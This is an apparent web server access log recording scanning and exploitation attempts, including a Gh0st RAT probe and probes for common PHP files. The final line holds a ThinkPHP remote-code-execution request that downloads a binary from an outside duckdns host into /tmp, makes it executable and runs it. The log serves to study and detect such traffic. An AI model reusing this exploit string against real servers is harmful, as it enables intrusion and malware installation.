212.91.246.72 - - [03/Feb/2020:14:16:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
40.83.125.200 - - [03/Feb/2020:14:16:32 +0100] "GET /phpinfo.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
40.83.125.200 - - [03/Feb/2020:14:16:33 +0100] "GET /test.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
40.83.125.200 - - [03/Feb/2020:14:16:33 +0100] "POST /index.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36"
66.240.205.34 - - [03/Feb/2020:14:16:48 +0100] "Gh0st\xad" 501 321 "-" "-"
40.83.125.200 - - [03/Feb/2020:14:16:56 +0100] "POST /bbs.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36"
42.117.35.11 - - [03/Feb/2020:14:16:57 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
